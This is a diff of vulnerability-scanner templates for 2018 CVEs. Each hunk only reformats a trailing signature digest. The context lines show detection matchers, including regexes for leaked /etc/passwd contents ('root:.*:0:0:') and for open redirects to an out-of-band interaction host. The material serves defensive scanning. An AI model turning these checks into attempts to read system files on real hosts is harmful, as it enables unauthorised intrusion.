type: status status: - 200 -# digest: 4a0a00473045022048a51f587b111097f3616ee150c3140c1f7951f135136f76512724720bdce20c02210090c0bfc4c2303fc3138ee83cb822b5831cba44c9906e6e9e71477f70efc659e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048a51f587b111097f3616ee150c3140c1f7951f135136f76512724720bdce20c02210090c0bfc4c2303fc3138ee83cb822b5831cba44c9906e6e9e71477f70efc659e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 584d84e850..870c409b2b 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -45,4 +45,5 @@ http: negative: true status: - 404 -# digest: 4b0a00483046022100e7a15beda520d565eda27d1e3158f8e55e9c3902a168a12eaaaaccc66d4548360221009c556ecacb53dd2d7c5b52e893448f10f1f3b9a1996de981f3f2e10275e654aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e7a15beda520d565eda27d1e3158f8e55e9c3902a168a12eaaaaccc66d4548360221009c556ecacb53dd2d7c5b52e893448f10f1f3b9a1996de981f3f2e10275e654aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index d0a07ed629..17912c81c8 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203ff48bded51f3a5f66d801557c8e0bb31b2a0a276d16745687ab70b51df0750a022100a0828678ec40e84c1d54f217565980ac0f7c636c8762f8cddc541ede0cfd9ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203ff48bded51f3a5f66d801557c8e0bb31b2a0a276d16745687ab70b51df0750a022100a0828678ec40e84c1d54f217565980ac0f7c636c8762f8cddc541ede0cfd9ae9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 8a9cdcec73..041ef0dd26 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204446d8f46baca1af213892044a9629da0fc37ca2ffadf4694da38ecc13d56f39022040cf4a0968e41db49892c97d7c9c2a1000a2bdaf4eecac540583a0798eb7f2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204446d8f46baca1af213892044a9629da0fc37ca2ffadf4694da38ecc13d56f39022040cf4a0968e41db49892c97d7c9c2a1000a2bdaf4eecac540583a0798eb7f2e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index de3e1c0868..b3cbabd4fe 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -40,4 +40,5 @@ http: part: response words: - "calling init: /lib/" -# digest: 4a0a00473045022100abc61d46b7976ebee8ae93ff9d18385834c7cd6aae7631249cc8478821ad5b99022033caeea7511d965dd9d10cfd005ef6a6a0f2ce14a01acc7db7f10711a0a02449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100abc61d46b7976ebee8ae93ff9d18385834c7cd6aae7631249cc8478821ad5b99022033caeea7511d965dd9d10cfd005ef6a6a0f2ce14a01acc7db7f10711a0a02449:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 138e28b289..380f1cd758 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e62d245352b508b29ba1393b9d4761f8d93381266c46838e8a36420cf32951ad022100e3347f280c21ac4500fb88fad31c799ca3dd11f4eda7c4b087efabd873d696e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e62d245352b508b29ba1393b9d4761f8d93381266c46838e8a36420cf32951ad022100e3347f280c21ac4500fb88fad31c799ca3dd11f4eda7c4b087efabd873d696e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 4fb1fa1ca6..cba0ceb2f6 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -45,4 +45,5 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4b0a00483046022100ab549f97f96e07169ca84a2be79f811ed2595ab783e8a0dca20241b2f5190176022100ba2d25de61bc28029b8a2bfd6d3c02ff629c0c54be45444d8e79761b3ae05af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ab549f97f96e07169ca84a2be79f811ed2595ab783e8a0dca20241b2f5190176022100ba2d25de61bc28029b8a2bfd6d3c02ff629c0c54be45444d8e79761b3ae05af1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index aee9b93ea4..03c1a06109 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a00463044022078c41846e3ddf37ecc7019fbb0bf7aeafdca840befab89b961b03d2cff1c2bb202207a3516d0201192da59a3e79e819ed0ba1b3ff9a7317ca72e9f55ce9ed1afe87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022078c41846e3ddf37ecc7019fbb0bf7aeafdca840befab89b961b03d2cff1c2bb202207a3516d0201192da59a3e79e819ed0ba1b3ff9a7317ca72e9f55ce9ed1afe87b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 58c443c5a1..38e4ef2cd9 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d51236d1bbab64186d5c9e7491819b9e4b514d03fca871018ee6329bde27359022077bc677e4d701981c8fd84aaec16f40a1c306723457c46a67a553db5a9f9ca17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008d51236d1bbab64186d5c9e7491819b9e4b514d03fca871018ee6329bde27359022077bc677e4d701981c8fd84aaec16f40a1c306723457c46a67a553db5a9f9ca17:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 561fa4de71..a846e77051 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022044ba9a3e363cee2e09f52dfc907390c71ae3762fa55c228c3e1bbea39aa209d0022032ec3457c3bb58817c83aee77b0b4ffe4103b4075df21f14df31d6e7041c92cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022044ba9a3e363cee2e09f52dfc907390c71ae3762fa55c228c3e1bbea39aa209d0022032ec3457c3bb58817c83aee77b0b4ffe4103b4075df21f14df31d6e7041c92cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 083e3dce2d..0eeda69414 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -38,4 +38,5 @@ http: part: body words: - '' -# digest: 490a0046304402201bf95159d1dcbb23ba204580bceb0b4c7c91233565a7e2a37ee4c69d819ee332022068a13e2734b6f4703720fa8e76280aba797982729fe185f685867b52849eba91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201bf95159d1dcbb23ba204580bceb0b4c7c91233565a7e2a37ee4c69d819ee332022068a13e2734b6f4703720fa8e76280aba797982729fe185f685867b52849eba91:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 3308ec4fe5..950de8ec7a 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022073ac77eeb9df3b7fcad4c48c678cf2889638cac36edafcf0a2de8f1f2723a54f022100b0d0c1a898945a94a03716c78b039279e224260528454f860ad88724dba68616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022073ac77eeb9df3b7fcad4c48c678cf2889638cac36edafcf0a2de8f1f2723a54f022100b0d0c1a898945a94a03716c78b039279e224260528454f860ad88724dba68616:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index fe2bf90d4f..b7c13b97ed 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -53,4 +53,5 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or -# digest: 490a0046304402201921025fe15f62db17f9383d6d7cdfd37fa4db1815651c0ed7e6317a9d4cac7f02207aa9d9967f70cc6a44428ab9e621844c395ae5357f49c49c1f9febe752513c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201921025fe15f62db17f9383d6d7cdfd37fa4db1815651c0ed7e6317a9d4cac7f02207aa9d9967f70cc6a44428ab9e621844c395ae5357f49c49c1f9febe752513c9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 6ff5cea1f0..2f1400ace0 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0cd9849da99ec44921c44b8f0dc51d3d82484d2e52cd4809de8e388e8e361fb022100cd53c700a52f901136d133235b1667e691869b4ab0639bc727bfbfc0c1e47684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c0cd9849da99ec44921c44b8f0dc51d3d82484d2e52cd4809de8e388e8e361fb022100cd53c700a52f901136d133235b1667e691869b4ab0639bc727bfbfc0c1e47684:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index c17f537aa2..f216c75857 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8873fcaabc5dc6473f1393e907e75dd5e78fd5350b3a15a58c1c6b407e1598c022100cf7d7970de17dbe61ed3bd35a74c4730f5a211188949da79ac7ef194fddc4d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d8873fcaabc5dc6473f1393e907e75dd5e78fd5350b3a15a58c1c6b407e1598c022100cf7d7970de17dbe61ed3bd35a74c4730f5a211188949da79ac7ef194fddc4d2a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 9f1437e2b5..7efb472a70 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100be02ef27cbc2addc9cbaf93da5ff65cb5c18df6f3113ebd076a33b9419d6aaf002202fb40ef46cf880bc20f1b80c1b12313a41b77c4829bc541f7e288b147952270c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100be02ef27cbc2addc9cbaf93da5ff65cb5c18df6f3113ebd076a33b9419d6aaf002202fb40ef46cf880bc20f1b80c1b12313a41b77c4829bc541f7e288b147952270c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 62171670c9..a58f60cc04 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008a566204bc943f98ade97d918f7af85e0f4bfebd434122aeb5c3a0d1dac2639c022053ea6a69b806b503a7515d167e57f2731375cd6acf2f8adb9fe10c342dd2c0e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008a566204bc943f98ade97d918f7af85e0f4bfebd434122aeb5c3a0d1dac2639c022053ea6a69b806b503a7515d167e57f2731375cd6acf2f8adb9fe10c342dd2c0e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 33af721dbf..836da7383e 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b635885709df48d9d36c2b41636accfad77713420cb6c8c8b39f4082aca0a4d802200233a303d178d29eb9ccbe00e37583ab5ac0d787fc460cd7f568c33caa2bf3be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b635885709df48d9d36c2b41636accfad77713420cb6c8c8b39f4082aca0a4d802200233a303d178d29eb9ccbe00e37583ab5ac0d787fc460cd7f568c33caa2bf3be:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index d721e1e75e..9eaabab6ec 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bfa95d7522f9007763e1f0000aaef908d87a44a7941d968710b31099da23991b02201bfd5cf907a3c8dbf0bdb4c50c207392d3ec3e2f790ecdf1ceb9242d5c892da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bfa95d7522f9007763e1f0000aaef908d87a44a7941d968710b31099da23991b02201bfd5cf907a3c8dbf0bdb4c50c207392d3ec3e2f790ecdf1ceb9242d5c892da3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index b89fb8a001..d0eff912ee 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402205d742db4e9dd14efe7ad7701d1440cc8e699af843b1f4c90e57ca4b3c77c3cce02200db8d56f9408998a5eb6e5f5225fb5d8f64fad0fadd942c7abd28e2ba2a6bf51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205d742db4e9dd14efe7ad7701d1440cc8e699af843b1f4c90e57ca4b3c77c3cce02200db8d56f9408998a5eb6e5f5225fb5d8f64fad0fadd942c7abd28e2ba2a6bf51:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index a32e9a706d..436cf8f831 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 301 -# digest: 4b0a00483046022100f9171a6b486bb4b8cfb2c35e4bcfbdf1803419315da150409067455657a59791022100d44d556a7d15fcc7ca07faeb4acd322c998c69c001d61b588c7368325a518c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f9171a6b486bb4b8cfb2c35e4bcfbdf1803419315da150409067455657a59791022100d44d556a7d15fcc7ca07faeb4acd322c998c69c001d61b588c7368325a518c64:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index ee7714053f..d3be21a2b5 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -36,4 +36,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100e3efc16bafb949c15013580256483cb13f71db82cd0b754eb6a6c2fe6142ae4e022100bcbedfa5e4df2b8f7de42d29f3d224cc620d33ecdbe64007762860559620782d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e3efc16bafb949c15013580256483cb13f71db82cd0b754eb6a6c2fe6142ae4e022100bcbedfa5e4df2b8f7de42d29f3d224cc620d33ecdbe64007762860559620782d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 111df76b83..f8270d4afb 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200efc727030c7cbc0d4fe2836bb27e68bc15059df3177f907279aeaa3dac061b1022100b783dc30438c7516662e79185df4e6efaee41a7c756f9230702afea58df5db2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200efc727030c7cbc0d4fe2836bb27e68bc15059df3177f907279aeaa3dac061b1022100b783dc30438c7516662e79185df4e6efaee41a7c756f9230702afea58df5db2d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 4fbff8ea7d..e2012273fe 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210094aae159f91c8cac5fd8a7167d2e9022cad2d4e611fd81cfaf7cfc36a9f75ac402202186dad2bdc990642be9697a2ab9fd5bc28595ceada60f2e090024aa32e4d043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210094aae159f91c8cac5fd8a7167d2e9022cad2d4e611fd81cfaf7cfc36a9f75ac402202186dad2bdc990642be9697a2ab9fd5bc28595ceada60f2e090024aa32e4d043:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index b1b5bd6be0..61381f7958 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b6eaf60603fee1dd481b57143401ed5fa71a49da304ed9842ba787b79ba9162602203c807b143191daa5a4ddd4aa41d04b0a343995ffcb58f896fd1ce8cbf9100993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b6eaf60603fee1dd481b57143401ed5fa71a49da304ed9842ba787b79ba9162602203c807b143191daa5a4ddd4aa41d04b0a343995ffcb58f896fd1ce8cbf9100993:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 57084b0676..3db1175ffb 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cbee073b0729c09186af8e602fa53d823dc2a2af4fc3e7883db652452f80d2f002205bc7fa6265b903a5c3398fd8e9eb54f2a2a19684b03a5dc8a9c26d4d12e4c095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cbee073b0729c09186af8e602fa53d823dc2a2af4fc3e7883db652452f80d2f002205bc7fa6265b903a5c3398fd8e9eb54f2a2a19684b03a5dc8a9c26d4d12e4c095:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 91dd0ada9a..dc90dbecc8 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -36,4 +36,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100eda47d8a07747e8d935846beccea26684dbc7f04738d6f2c2a7433d78ce2e9e302201c03d52762909e29beef7e39e2fa09fd4a3c81bc69ed2a0fe6432579da41b91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eda47d8a07747e8d935846beccea26684dbc7f04738d6f2c2a7433d78ce2e9e302201c03d52762909e29beef7e39e2fa09fd4a3c81bc69ed2a0fe6432579da41b91a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index d838cf38df..efff32d9b7 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204502c09f85ca7ef4dbf074b1d263633c80a47ec56dbc4904ecb33c8e652325d60221008abce0c1ca9361ea8fb59fad5665e1b09c8934e5e98e313bf32bc9575f040e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204502c09f85ca7ef4dbf074b1d263633c80a47ec56dbc4904ecb33c8e652325d60221008abce0c1ca9361ea8fb59fad5665e1b09c8934e5e98e313bf32bc9575f040e06:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index fdbd37b89c..c4f06743be 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -74,4 +74,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200bd84c708a20bfe6159913a4710fd325336a0612646f8f0721aa862db172682f022100b4e8653436f9dee6c6ecd443676c53f9572ce3653a6c5a65eb87dcbf66eb06aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200bd84c708a20bfe6159913a4710fd325336a0612646f8f0721aa862db172682f022100b4e8653436f9dee6c6ecd443676c53f9572ce3653a6c5a65eb87dcbf66eb06aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 6e020fc462..489dac3ae0 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022052946c7dcd83bae1f45368697241463be635362cb10a6226149e6a9647a443f3022100dd1dde21220a824a738b388dff88bb0990040344efbabb0db1e10264e5a01e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022052946c7dcd83bae1f45368697241463be635362cb10a6226149e6a9647a443f3022100dd1dde21220a824a738b388dff88bb0990040344efbabb0db1e10264e5a01e0c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index c2604badd1..c486c05d6c 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -41,4 +41,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a0047304502210094fcb8eb8ee2a472a849cf6d21947f7e0c1676bb7e8f1cded2d5ea364140228002203cbd217aa64901d9de359224c7d0e29987fdc7679309373a9fdfb77bda6823ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210094fcb8eb8ee2a472a849cf6d21947f7e0c1676bb7e8f1cded2d5ea364140228002203cbd217aa64901d9de359224c7d0e29987fdc7679309373a9fdfb77bda6823ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 69c84bbe71..8f1d469f7d 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025ce38c8852d1b5ee6372d37af7e588667d6a8674387c023dd26011cee750fb6022100a3a621d065146eb0044391c86130aa54596afbedc8a0ae33c793bcd3241e84d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022025ce38c8852d1b5ee6372d37af7e588667d6a8674387c023dd26011cee750fb6022100a3a621d065146eb0044391c86130aa54596afbedc8a0ae33c793bcd3241e84d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index a3d67b46d2..4c444990ec 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -47,4 +47,5 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 490a004630440220280ac7c7a2a1bd04a1ad0b28fdf7f07aef70111a96771d76abb78afcd9f4970d022015f2ff4cf8a5f050c9a4ed9bd54dc849ccaccc6192058dceffbd3fba2f1fbbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220280ac7c7a2a1bd04a1ad0b28fdf7f07aef70111a96771d76abb78afcd9f4970d022015f2ff4cf8a5f050c9a4ed9bd54dc849ccaccc6192058dceffbd3fba2f1fbbd5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 7af0f4be88..f33d3f667d 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -41,4 +41,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 490a0046304402205cd4e5dc5053ab2f80a411d642e309904cae39914c241ce249ad26b4d52635dd022054aac486f122b6b9431ca0182dce107b66463c725cbf081592ea9b51fce9a93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205cd4e5dc5053ab2f80a411d642e309904cae39914c241ce249ad26b4d52635dd022054aac486f122b6b9431ca0182dce107b66463c725cbf081592ea9b51fce9a93d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 0fa510c920..c9c39ed08b 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,4 +38,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a00463044022010b5036584950d441296e2f7877d2c1bb1abeac129deb78077184e474aeed82e022008df62aab53b8294fb96a66a5829c6511cc2f16039b8857de90e885b178c4113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022010b5036584950d441296e2f7877d2c1bb1abeac129deb78077184e474aeed82e022008df62aab53b8294fb96a66a5829c6511cc2f16039b8857de90e885b178c4113:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index dda643d7be..faee26d6a5 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022009bdbfb0666b15a711ff1cd1114f15e153b501a81bc22138e8f61b5f18ccc824022100b18c2984577ed6bad5c714ab1f60c119fb4aae5475136ae6de1512bfde9d61ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022009bdbfb0666b15a711ff1cd1114f15e153b501a81bc22138e8f61b5f18ccc824022100b18c2984577ed6bad5c714ab1f60c119fb4aae5475136ae6de1512bfde9d61ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 2c24108657..b017db468f 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220119e535e1c6280ce228aabaaac6ebb80a95ee91300bfd92b932197380a3a57e90220420895549398a5b53c3e3d026f80354f5d4e9abd4345468495ea3cfa19904397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 